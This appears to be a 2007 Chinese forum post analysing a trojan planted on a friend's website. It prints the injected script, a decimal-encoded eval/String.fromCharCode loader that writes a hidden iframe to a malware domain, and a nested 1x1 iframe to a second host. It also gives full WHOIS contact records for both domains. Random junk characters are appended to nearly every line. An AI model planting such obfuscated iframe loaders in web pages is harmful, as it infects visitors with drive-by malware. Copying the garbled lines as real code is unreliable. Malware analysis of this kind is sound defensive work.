[原创]一篇刚写的分析木马手记

首发在我的博客里面， $DmWK_A  
.`OyC'  
http://www.areway.cn/?p=175 b{C3r3B8  
5JE8/CbH  
]OE{qXr{  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： 0jsU^m
<g  
          9OeY59 :  
<script>t=’60,105,102,114,97,109,101, J 00%,Ju_  
32,115,114,99,61,104,116,116,112,58,47,47, >;N0( xB  
102,114,101,101,46,117,45,117,117,117,46,99, li4rK<O  
110,47,101,114,114,111,114,46,104,116,109, Ng?n}$g*  
32,119,105,100,116,104,61,49,48,48,32,104, EROf%oaz=  
101,105,103,104,116,61,48,62,60,47,105,102, 2t3'"8xJ  
114,97,109,101,62′; em  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> %t&5o>1C  
                                                                                                  AR i_m  
<script>t=’60,105,102,114,97,109,101,32,115, fA!uSqR$V  
114,99,61,104,116,116,112,58,47,47,102,114, .u3!%{/v(c  
101,101,46,117,45,117,117,117,46,99,110,47, wz-9+VN6  
101,114,114,111,114,46,104,116,109,32,119, #:{Bd8PS  
105,100,116,104,61,49,48,48,32,104,101,105, OXy>Tlv  
103,104,116,61,48,62,60,47,105,102,114,97, 36154*q  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); 4#$~gTc@  
document.write(t);</script> qm
-G=EX  
                                                                                                  x[+t  
<html xmlns=” NGD?.^ (G  
http://www.w3.org/1999/xhtml B{wx"mK  
“> Vd2bG4*=  
<head> fZ2>%IxG}  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> VjbRjn5LI  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> }ZMbTsm  
<title>首页 - 爱生活家庭网 ~7Ey9wRkD  
                                                                                                                                                    aVI/x5p~  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 !7MC[z(|N  
转换字符串后的大概内容是（谁点击后果自付）： YN1P9j#0d  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… d`D<PT(\  
                                                                                                                                  q<L>r?T[  
查询玉米u-uuu.cn的详细信息： lE~5 b  
Domain Name: u-uuu.cn b[<zT[.:  
ROID: 20070901s10001s64972306-cn DGl_SMJb  
Domain Status: ok U^trZ])  
Registrant Organization: 王雷 cD&53FPXC  
Registrant Name: 王雷 S) /(~  
Administrative Email: czlovexs@126.com TFbMrIF  
Sponsoring Registrar: 北京万网志成科技有限公司 eHCLENLmB  
Name Server:ns.yovole.com G992{B  
Name Server:ns1.yovole.com !/W[6'M#p  
Registration Date: 2007-09-01 17:54 {AbQaw  
Expiration Date: 2008-09-01 17:54 @EZ@X/8{&  
最后PING了一下地址 都没有什么…. qJ=4HlLno  
                                                                                                :-B,Q3d  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. zY\pZG  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> 0Fr
mZ$  
<script language=”javascript” src=” /3F4t V  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script X\tE#c&K  
> 5?+ECxPt  
这个玉米应该有可能是木马作者的： /; ;_l2t  
foafau.info的详细信息： h:iK;  
Access to INFO WHOIS information is provided to assist persons in T^3_d93}d  
determining the contents of a domain name registration record in the XK[cbVu  
Afilias registry database. The data in this record is provided by V @A+d[  
Afilias Limited for informational purposes only, and Afilias does not \2(Uqf#_  
guarantee its accuracy.  This service is intended only for query-based `9a %vN  
access. You agree that you will use this data only for lawful purposes Fp>iwdjFg  
and that, under no circumstances will you use this data to: (a) allow, 6-U+<[,x  
enable, or otherwise support the transmission by e-mail, telephone, or \F;V69'  
facsimile of mass unsolicited, commercial advertising or solicitations \_pP:e  
to entities other than the data recipient’s own existing customers; or XUT,)dL  
(b) enable high volume, automated, electronic processes that send E5D5  
queries or data to the systems of Registry Operator, a Registrar, or aqq7u5O1
r  
Afilias except as reasonably necessary to register domain names or w=.w*?>  
modify existing registrations. All rights reserved. Afilias reserves ZUJ!  
the right to modify these terms at any time. By submitting this query, t]|WRQvy8  
you agree to abide by this policy. |~b.rKQt[  
Domain ID:D22418703-LRMS t#tAvwFM8  
Domain Name:FOAFAU.INFO iR;Sd >)  
Created On:20-Nov-2007 16:05:42 UTC o2e aSG  
Last Updated On:20-Nov-2007 16:05:44 UTC rQ -pD  
Expiration Date:20-Nov-2008 16:05:42 UTC *oAv:8"iY  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) P;o6rQf  
Status:CLIENT DELETE PROHIBITED %~`8F\Hiu  
Status:CLIENT RENEW PROHIBITED 5gnNgt~  
Status:CLIENT TRANSFER PROHIBITED ]J;pUH+u  
Status:CLIENT UPDATE PROHIBITED Z?k4Kb  
Status:TRANSFER PROHIBITED H!Gsu$C  
Registrant ID:GODA-040110615 xc[LbaBG  
Registrant Name:liu hong pPt7M'uL"  
Registrant Organization: %n-:mSus  
Registrant Street1:beijing g4,>cqRkq  
Registrant Street2: ?N2/;u>  
Registrant Street3: s&MfC\  
Registrant City:beijing U4]>8L  
Registrant State/Province: _=9o:F  
Registrant Postal Code:100000 EoM}Co  
Registrant Country:CN vL"U=Q+/eY  
Registrant Phone:+86.860108888777 }oHA@o5  
Registrant Phone Ext.: '@)47]~  
Registrant FAX: %?K1X^52d  
Registrant FAX Ext.: gqR?hZD  
Registrant Email:bbbshiji@163.com d;`bX+K  
Admin ID:GODA-240110615 InDISl]  
Admin Name:liu hong =Nn&$h l  
Admin Organization: IXYSZ)z  
Admin Street1:beijing Fm(~Vt;%u  
Admin Street2: |=H*" (  
Admin Street3: cI)T@Zg_o+  
Admin City:beijing \
.HX7v  
Admin State/Province: <}S1ZEZcQ  
Admin Postal Code:100000 //63?s+  
Admin Country:CN 1:]iV}OFqR  
Admin Phone:+86.860108888777 `2X~3im  
Admin Phone Ext.: c e`3&  
Admin FAX: qMT7g LB'1  
Admin FAX Ext.: 5MsE oLg  
Admin Email:bbbshiji@163.com K7 >Z)21  
Billing ID:GODA-340110615 |:_WdU"Q]  
Billing Name:liu hong 16"eyt>  
Billing Organization: 'f0*~Wq|  
Billing Street1:beijing C2RR(n=N^  
Billing Street2: \a]JH\T)Q  
Billing Street3: bl. y4  
Billing City:beijing `p`)D6  
Billing State/Province: ~e,k71  
Billing Postal Code:100000 N yT|=`;  
Billing Country:CN )SG+9!AbMZ  
Billing Phone:+86.860108888777 @
T53%v<5  
Billing Phone Ext.: =KfV;.&  
Billing FAX: m
1DzUq;  
Billing FAX Ext.: 0Lcd@3XL  
Billing Email:bbbshiji@163.com vJ96qX  
Tech ID:GODA-140110615 ~IvAnwQ'  
Tech Name:liu hong iHy=92/Ww  
Tech Organization: kfaRN^  
Tech Street1:beijing KLpu7D5(|  
Tech Street2: =fmM=@!$<  
Tech Street3: ]$[J_f*x  
Tech City:beijing UN{_f)E?  
Tech State/Province: ;O=tSEe  
Tech Postal Code:100000 p9]008C89  
Tech Country:CN %Od?(m"&  
Tech Phone:+86.860108888777 )G$/II9d  
Tech Phone Ext.: n"YY:Gm;8  
Tech FAX: nbM[?=WS  
Tech FAX Ext.: ]k~k6#),;  
Tech Email:bbbshiji@163.com GtcY){7  
Name Server:NS27.DOMAINCONTROL.COM ,4$ZB(\  
Name Server:NS28.DOMAINCONTROL.COM  9?c0cwP?  
Name Server: r )8[LN-  
Name Server: `I+G7KK  
Name Server: vt0XCUnK  
Name Server: {KJ!rT  
Name Server: 7\*_/[
B  
Name Server: W]Z;=-CBr  
Name Server: *,g|I8?%VD  
Name Server: o33wePx,  
Name Server: ] h3~>8<  
Name Server: ,$irJz F  
Name Server: rlSar$  
                                                                                                          TJS/O~=  
接着下载每个文件里面的代码： Zt:.+.dV  
一步一步看.. lUWX[,  
|^jl^oW  
#"{w
m  
N)Fy#6  
wi'CBfr'z  
\T)
2J|mW  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来